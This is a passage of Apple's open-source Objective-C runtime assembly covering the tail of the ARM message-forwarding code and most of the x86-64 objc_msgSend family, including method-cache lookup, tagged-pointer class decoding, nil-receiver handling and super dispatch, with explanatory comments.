// original arguments restored.
STATIC_ENTRY _objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r9 is the class to search
// Save argument registers + frame; 6 words pushed, then 8 more bytes
// to keep the stack 8-byte aligned for the C call.
stmfd sp!, {r0-r3,r7,lr}
add r7, sp, #16
sub sp, #8 // align stack
FP_SAVE
// receiver already in r0
// selector already in r1
mov r2, r9 // class to search
MI_CALL_EXTERNAL(__class_lookupMethodAndLoadCache3)
mov r12, r0 // r12 = IMP
movs r9, #0 // r9=0, Z=1 for nonstret forwarding
FP_RESTORE
add sp, #8 // align stack
ldmfd sp!, {r0-r3,r7,lr}
bx r12
END_ENTRY _objc_msgSend_uncached
// Struct-return variant: receiver/selector arrive in r1/r2 (r0 is the
// struct-return address) and must be shuffled into C argument positions.
STATIC_ENTRY _objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r9 is the class to search
stmfd sp!, {r0-r3,r7,lr}
add r7, sp, #16
sub sp, #8 // align stack
FP_SAVE
mov r0, r1 // receiver
mov r1, r2 // selector
mov r2, r9 // class to search
MI_CALL_EXTERNAL(__class_lookupMethodAndLoadCache3)
mov r12, r0 // r12 = IMP
movs r9, #1 // r9=1, Z=0 for stret forwarding
FP_RESTORE
add sp, #8 // align stack
ldmfd sp!, {r0-r3,r7,lr}
bx r12
END_ENTRY _objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
MI_EXTERN(__objc_forward_handler)
MI_EXTERN(__objc_forward_stret_handler)
STATIC_ENTRY _objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band Z is 0 (EQ) for normal, 1 (NE) for stret and/or super
// Out-of-band r9 is 1 for stret, cls for super, cls|1 for super_stret
// Note _objc_msgSend_uncached_impcache uses the same parameters
MESSENGER_START
nop
MESSENGER_END_SLOW
// Flavor decode: if EQ (normal), tstne is skipped and beq falls to the
// non-stret forwarder. If NE, tstne tests r9 bit0: clear (super) takes
// beq to the non-stret forwarder; set (stret/super_stret) falls through.
it ne
tstne r9, #1
beq __objc_msgForward
b __objc_msgForward_stret
END_ENTRY _objc_msgForward_impcache
ENTRY _objc_msgForward
// Non-stret version
// Tail-call through the runtime's installed forwarding handler.
MI_GET_EXTERN(r12, __objc_forward_handler)
ldr r12, [r12]
bx r12
END_ENTRY _objc_msgForward
ENTRY _objc_msgForward_stret
// Struct-return version
MI_GET_EXTERN(r12, __objc_forward_stret_handler)
ldr r12, [r12]
bx r12
END_ENTRY _objc_msgForward_stret
// Debug entry points: distinct symbols that simply tail-branch to the
// real messengers.
ENTRY objc_msgSend_debug
b _objc_msgSend
END_ENTRY objc_msgSend_debug
ENTRY objc_msgSendSuper2_debug
b _objc_msgSendSuper2
END_ENTRY objc_msgSendSuper2_debug
ENTRY objc_msgSend_stret_debug
b _objc_msgSend_stret
END_ENTRY objc_msgSend_stret_debug
ENTRY objc_msgSendSuper2_stret_debug
b _objc_msgSendSuper2_stret
END_ENTRY objc_msgSendSuper2_stret_debug
// method_invoke: call a Method's IMP directly, replacing the method
// triplet argument with its selector (method fields at METHOD_* offsets).
ENTRY method_invoke
// r1 is method triplet instead of SEL
ldr r12, [r1, #METHOD_IMP]
ldr r1, [r1, #METHOD_NAME]
bx r12
END_ENTRY method_invoke
ENTRY method_invoke_stret
// r2 is method triplet instead of SEL
ldr r12, [r2, #METHOD_IMP]
ldr r2, [r2, #METHOD_NAME]
bx r12
END_ENTRY method_invoke_stret
// IMP that does nothing and returns self unchanged.
STATIC_ENTRY _objc_ignored_method
// self is already in a0
bx lr
END_ENTRY _objc_ignored_method
// Zero terminator for the _gdb_objc_messenger_breakpoints table.
.section __DATA,__objc_msg_break
.long 0
.long 0
#endif
/* ==== end of runtime/Messengers.subproj/objc-msg-arm.s (opensource-apple/objc4) ==== */
/* ==== begin runtime/Messengers.subproj/objc-msg-x86_64.s (opensource-apple/objc4) ==== */
/*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if __x86_64__ && !TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-x86_64.s - x86-64 code to support objc messaging.
**
********************************************************************
********************************************************************/
/********************************************************************
* Data used by the ObjC runtime.
*
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
// The tables are parallel and zero-terminated: entryPoints[i] starts the
// region that exitPoints[i] (the LExit_* label emitted by END_ENTRY) ends.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSend_fpret
.quad _objc_msgSend_fp2ret
.quad _objc_msgSend_stret
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper_stret
.quad _objc_msgSendSuper2
.quad _objc_msgSendSuper2_stret
.quad 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSend_fpret
.quad LExit_objc_msgSend_fp2ret
.quad LExit_objc_msgSend_stret
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper_stret
.quad LExit_objc_msgSendSuper2
.quad LExit_objc_msgSendSuper2_stret
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
// Each MESSENGER_* macro drops local label 4: at the current .text position,
// records the pair (address, type) in __DATA,__objc_msg_break, and switches
// back to .text. They emit no instructions.
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/********************************************************************
* Recommended multi-byte NOP instructions
* (Intel 64 and IA-32 Architectures Software Developer's Manual Volume 2B)
********************************************************************/
#define nop1 .byte 0x90
#define nop2 .byte 0x66,0x90
#define nop3 .byte 0x0F,0x1F,0x00
#define nop4 .byte 0x0F,0x1F,0x40,0x00
#define nop5 .byte 0x0F,0x1F,0x44,0x00,0x00
#define nop6 .byte 0x66,0x0F,0x1F,0x44,0x00,0x00
#define nop7 .byte 0x0F,0x1F,0x80,0x00,0x00,0x00,0x00
#define nop8 .byte 0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
#define nop9 .byte 0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
/********************************************************************
* Harmless branch prefix hint for instruction alignment
********************************************************************/
// 0x2e is the CS segment-override prefix, meaningless on a following
// conditional branch; used purely as one-byte padding.
#define PN .byte 0x2e
/********************************************************************
* Names for parameter registers.
********************************************************************/
// System V AMD64 integer argument registers a1..a6, with 32-bit (d)
// and 8-bit (b) views.
#define a1 rdi
#define a1d edi
#define a1b dil
#define a2 rsi
#define a2d esi
#define a2b sil
#define a3 rdx
#define a3d edx
#define a4 rcx
#define a4d ecx
#define a5 r8
#define a5d r8d
#define a6 r9
#define a6d r9d
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 6: 7: 8: 9:
********************************************************************/
// These expand to assembler numeric local labels; _f/_b are the
// forward/backward references.
#define LCacheMiss 6
#define LCacheMiss_f 6f
#define LCacheMiss_b 6b
#define LNilTestSlow 7
#define LNilTestSlow_f 7f
#define LNilTestSlow_b 7b
#define LGetIsaDone 8
#define LGetIsaDone_f 8f
#define LGetIsaDone_b 8b
#define LGetIsaSlow 9
#define LGetIsaSlow_f 9f
#define LGetIsaSlow_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
// Dispatch flavor selectors passed to CacheLookup / CacheHit / NilTest.
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6
#define SUPER2 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// objc_super parameter to sendSuper (8-byte pointer fields)
#define receiver 0
#define class 8
// Selected field offsets in class structure
// #define isa 0 USE GetIsa INSTEAD
// Method descriptor
#define method_name 0
#define method_imp 16
// typedef struct {
// uint128_t floatingPointArgs[8]; // xmm0..xmm7
// long linkageArea[4]; // r10, rax, ebp, ret
// long registerArgs[6]; // a1..a6
// long stackArgs[0]; // variable-size
// } *marg_list;
#define FP_AREA 0
#define LINK_AREA (FP_AREA+8*16)
#define REG_AREA (LINK_AREA+4*8)
#define STACK_AREA (REG_AREA+6*8)
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
// 64-byte (cache-line) alignment, padded with 0x90 (nop).
.align 6, 0x90
$0:
.cfi_startproc
.endmacro
// Same as ENTRY but not exported from the image; only 4-byte aligned.
.macro STATIC_ENTRY
.text
.private_extern $0
.align 2, 0x90
$0:
.cfi_startproc
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
// Also emits the LExit$0 label consumed by the _objc_exitPoints table.
.macro END_ENTRY
.cfi_endproc
LExit$0:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// SaveRegisters
//
// Pushes a stack frame and saves all registers that might contain
// parameter values.
//
// On entry:
// stack = ret
//
// On exit:
// %rsp is 16-byte aligned
//
/////////////////////////////////////////////////////////////////////
// Saves xmm0-xmm7, rax, and the six integer argument registers so the
// C lookup call cannot clobber the in-flight message arguments. The
// movdqa stores are interleaved with the pushes for scheduling; the xmm
// saves land in the 0x80-byte area below %rbp.
.macro SaveRegisters
push %rbp
.cfi_def_cfa_offset 16
.cfi_offset rbp, -16
mov %rsp, %rbp
.cfi_def_cfa_register rbp
sub $$0x80+8, %rsp // +8 for alignment
movdqa %xmm0, -0x80(%rbp)
push %rax // might be xmm parameter count
movdqa %xmm1, -0x70(%rbp)
push %a1
movdqa %xmm2, -0x60(%rbp)
push %a2
movdqa %xmm3, -0x50(%rbp)
push %a3
movdqa %xmm4, -0x40(%rbp)
push %a4
movdqa %xmm5, -0x30(%rbp)
push %a5
movdqa %xmm6, -0x20(%rbp)
push %a6
movdqa %xmm7, -0x10(%rbp)
.endmacro
/////////////////////////////////////////////////////////////////////
//
// RestoreRegisters
//
// Pops a stack frame pushed by SaveRegisters
//
// On entry:
// %rbp unchanged since SaveRegisters
//
// On exit:
// stack = ret
//
/////////////////////////////////////////////////////////////////////
// Exact mirror of SaveRegisters: pops in reverse push order and reloads
// the xmm registers from the frame before tearing it down with leave.
.macro RestoreRegisters
movdqa -0x80(%rbp), %xmm0
pop %a6
movdqa -0x70(%rbp), %xmm1
pop %a5
movdqa -0x60(%rbp), %xmm2
pop %a4
movdqa -0x50(%rbp), %xmm3
pop %a3
movdqa -0x40(%rbp), %xmm4
pop %a2
movdqa -0x30(%rbp), %xmm5
pop %a1
movdqa -0x20(%rbp), %xmm6
pop %rax
movdqa -0x10(%rbp), %xmm7
leave
.cfi_def_cfa rsp, 8
.cfi_same_value rbp
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type, caller
//
// Locate the implementation for a class in a selector's method cache.
//
// Takes:
// $0 = NORMAL, FPRET, FP2RET, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// a2 or a3 (STRET) = selector a.k.a. cache
// r11 = class to search
//
// On exit: r10 clobbered
// (found) calls or returns IMP, eq/ne/r11 set for forwarding
// (not found) jumps to LCacheMiss, class still in r11
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in order to set the correct flags for _objc_msgForward_impcache.
// r10 = found bucket
// Buckets are 16 bytes, { SEL sel; IMP imp; }: bucket->imp is at 8(%r10).
// Each non-GETIMP flavor also sets the out-of-band eq/ne convention
// (eq = non-stret, ne = stret) consumed by the forwarding machinery.
.if $0 == GETIMP
movq 8(%r10), %rax // return imp
leaq __objc_msgSend_uncached_impcache(%rip), %r11
cmpq %rax, %r11
jne 4f
xorl %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET || $0 == FP2RET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == STRET
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.else
.abort oops
.endif
.endmacro
// CacheLookup $0: scan the class's method cache (see banner above).
// Cache layout read here: buckets pointer at 16(%r11), 32-bit mask at
// 24(%r11); each bucket is 16 bytes ({sel, imp}). sel==0 means empty
// (miss); sel==1 is the wrap sentinel whose imp slot points back into
// the bucket array.
.macro CacheLookup
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
movq %a2, %r10 // r10 = _cmd
.else
movq %a3, %r10 // r10 = _cmd
.endif
andl 24(%r11), %r10d // r10 = _cmd & class->cache.mask
shlq $$4, %r10 // r10 = offset = (_cmd & mask)<<4
addq 16(%r11), %r10 // r10 = class->cache.buckets + offset
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1f // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// wrap or miss
jb LCacheMiss_f // if (bucket->sel < 1) cache miss
// wrap
movq 8(%r10), %r10 // bucket->imp is really first bucket
// Continue in the second (cloned) loop below so a corrupt cache can
// wrap at most once before missing.
jmp 2f
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// double wrap or miss
jmp LCacheMiss_f
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup classRegister, selectorRegister
//
// Takes: $0 = class to search (a1 or a2 or r10 ONLY)
// $1 = selector to search for (a2 or a3 ONLY)
// r11 = class to search
//
// On exit: imp in %r11
//
/////////////////////////////////////////////////////////////////////
// Registers are saved first so the original arguments survive the C
// call; on return the IMP is moved to r11 before they are restored.
// The restricted $0/$1 register choices keep the two movq shuffles
// below from clobbering a source before it is read.
.macro MethodTableLookup
MESSENGER_END_SLOW
SaveRegisters
// _class_lookupMethodAndLoadCache3(receiver, selector, class)
movq $0, %a1
movq $1, %a2
movq %r11, %a3
call __class_lookupMethodAndLoadCache3
// IMP is now in %rax
movq %rax, %r11
RestoreRegisters
.endmacro
/////////////////////////////////////////////////////////////////////
//
// GetIsaFast return-type
// GetIsaSupport return-type
//
// Sets r11 = obj->isa. Consults the tagged isa table if necessary.
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// a1 or a2 (STRET) = receiver
//
// On exit: r11 = receiver->isa
// r10 is clobbered
//
/////////////////////////////////////////////////////////////////////
// Fast path: a set low bit marks a tagged-pointer object, which has no
// in-memory isa; otherwise mask the loaded isa word down to the class
// pointer bits.
.macro GetIsaFast
.if $0 != STRET
testb $$1, %a1b
PN
jnz LGetIsaSlow_f
movq $$0x00007ffffffffff8, %r11
andq (%a1), %r11
.else
testb $$1, %a2b
PN
jnz LGetIsaSlow_f
movq $$0x00007ffffffffff8, %r11
andq (%a2), %r11
.endif
LGetIsaDone:
.endmacro
// Slow path: index _objc_debug_taggedpointer_classes by the tag in the
// receiver's low nibble to get the class.
.macro GetIsaSupport2
LGetIsaSlow:
leaq _objc_debug_taggedpointer_classes(%rip), %r11
.if $0 != STRET
movl %a1d, %r10d
.else
movl %a2d, %r10d
.endif
andl $$0xF, %r10d
movq (%r11, %r10, 8), %r11 // read isa from table
.endmacro
// Out-of-line support block: placed after the fast path, jumps back.
.macro GetIsaSupport
GetIsaSupport2 $0
jmp LGetIsaDone_b
.endmacro
// Self-contained variant: fast path, jump over inline slow path.
.macro GetIsa
GetIsaFast $0
jmp LGetIsaDone_f
GetIsaSupport2 $0
LGetIsaDone:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// NilTest return-type
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// %a1 or %a2 (STRET) = receiver
//
// On exit: Loads non-nil receiver in %a1 or %a2 (STRET), or returns zero.
//
// NilTestSupport return-type
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// %a1 or %a2 (STRET) = receiver
//
// On exit: Loads non-nil receiver in %a1 or %a2 (STRET), or returns zero.
//
/////////////////////////////////////////////////////////////////////
.macro NilTest
.if $0 == SUPER || $0 == SUPER_STRET
error super dispatch does not test for nil
.endif
.if $0 != STRET
testq %a1, %a1
.else
testq %a2, %a2
.endif
PN
jz LNilTestSlow_f
.endmacro
// Out-of-line nil return: zero every register the flavor's return type
// might use, then return directly to the message sender.
.macro NilTestSupport
.align 3
LNilTestSlow:
.if $0 == FPRET
fldz // push 0.0 for x87 (long double) return
.elseif $0 == FP2RET
fldz
fldz // 0.0 in both x87 return slots
.endif
.if $0 == STRET
// Struct return: hand back the hidden struct address (rdi) in rax,
// as the ABI requires; the struct contents are left untouched.
movq %rdi, %rax
.else
xorl %eax, %eax
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
.endif
MESSENGER_END_NIL
ret
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: a1 = class whose cache is to be searched
* a2 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY _cache_getImp
// do lookup
movq %a1, %r11 // move class to r11 for CacheLookup
CacheLookup GETIMP // returns IMP on success
// LCacheMiss expands to local label 6: (see defines above).
LCacheMiss:
// cache miss, return nil
xorl %eax, %eax
ret
LGetImpExit:
END_ENTRY _cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
.data
.align 3
// 16 Class slots indexed by a tagged pointer's low-nibble tag; read by
// GetIsaSupport2. Zero-filled here; presumably populated by the runtime
// at startup — confirm against the C side.
.globl _objc_debug_taggedpointer_classes
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
NilTest NORMAL
GetIsaFast NORMAL // r11 = self->isa
CacheLookup NORMAL // calls IMP on success
// Out-of-line support blocks for the two macros above.
NilTestSupport NORMAL
GetIsaSupport NORMAL
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend
// Vtable-dispatch thunk entry: traps if ever called.
ENTRY _objc_msgSend_fixup
int3
END_ENTRY _objc_msgSend_fixup
STATIC_ENTRY _objc_msgSend_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend
END_ENTRY _objc_msgSend_fixedup
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // class = objc_super->class
CacheLookup SUPER // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2
* Unlike objc_msgSendSuper, objc_super->class here is the *current*
* class; dispatch starts at its superclass (loaded below).
********************************************************************/
ENTRY _objc_msgSendSuper2
MESSENGER_START
// objc_super->class is superclass of class to search
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // cls = objc_super->class
movq 8(%r11), %r11 // cls = class->superclass
CacheLookup SUPER2 // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2
// _fixup traps if ever reached; _fixedup loads SEL from the
// message_ref and tail-calls objc_msgSendSuper2.
ENTRY _objc_msgSendSuper2_fixup
int3
END_ENTRY _objc_msgSendSuper2_fixup
STATIC_ENTRY _objc_msgSendSuper2_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_fixedup
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
* Used for `long double` return only. `float` and `double` use objc_msgSend.
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
NilTest FPRET
GetIsaFast FPRET // r11 = self->isa
CacheLookup FPRET // calls IMP on success
NilTestSupport FPRET
GetIsaSupport FPRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fpret
// _fixup traps if ever reached; _fixedup loads SEL from the
// message_ref and tail-calls the fpret messenger.
ENTRY _objc_msgSend_fpret_fixup
int3
END_ENTRY _objc_msgSend_fpret_fixup
STATIC_ENTRY _objc_msgSend_fpret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_fixedup
/********************************************************************
*
* double objc_msgSend_fp2ret(id self, SEL _cmd,...);
* Used for `complex long double` return only.
*
********************************************************************/
ENTRY _objc_msgSend_fp2ret
MESSENGER_START
NilTest FP2RET
GetIsaFast FP2RET // r11 = self->isa
CacheLookup FP2RET // calls IMP on success
NilTestSupport FP2RET
GetIsaSupport FP2RET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fp2ret
ENTRY _objc_msgSend_fp2ret_fixup
int3
END_ENTRY _objc_msgSend_fp2ret_fixup
STATIC_ENTRY _objc_msgSend_fp2ret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_fixedup
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for %a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the message receiver,
* %a3 is the selector
********************************************************************/
// Struct-return form: %a1 = struct-return address, so the receiver is
// in %a2 and the selector in %a3 (see banner above).
ENTRY _objc_msgSend_stret
MESSENGER_START
NilTest STRET
GetIsaFast STRET // r11 = self->isa
CacheLookup STRET // calls IMP on success
NilTestSupport STRET
GetIsaSupport STRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_stret
ENTRY _objc_msgSend_stret_fixup
int3
END_ENTRY _objc_msgSend_stret_fixup
STATIC_ENTRY _objc_msgSend_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_fixedup
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the address of the objc_super structure,
* %a3 is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
CacheLookup SUPER_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
* As objc_msgSendSuper_stret, but objc_super->class is the current
* class and dispatch starts at its superclass.
********************************************************************/
ENTRY _objc_msgSendSuper2_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
movq 8(%r11), %r11 // class = class->superclass
CacheLookup SUPER2_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2_stret
// _fixup traps if ever reached; _fixedup loads SEL from the
// message_ref and tail-calls objc_msgSendSuper2_stret.
ENTRY _objc_msgSendSuper2_stret_fixup
int3
END_ENTRY _objc_msgSendSuper2_stret_fixup
STATIC_ENTRY _objc_msgSendSuper2_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_fixedup
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
*
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
********************************************************************/
STATIC_ENTRY __objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
// Out-of-band r11 is the searched class
// Dispatches on the caller-set flags (NE = stret argument layout).
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgSend_stret_uncached
jmp __objc_msgSend_uncached
END_ENTRY __objc_msgSend_uncached_impcache
STATIC_ENTRY __objc_msgSend_uncached
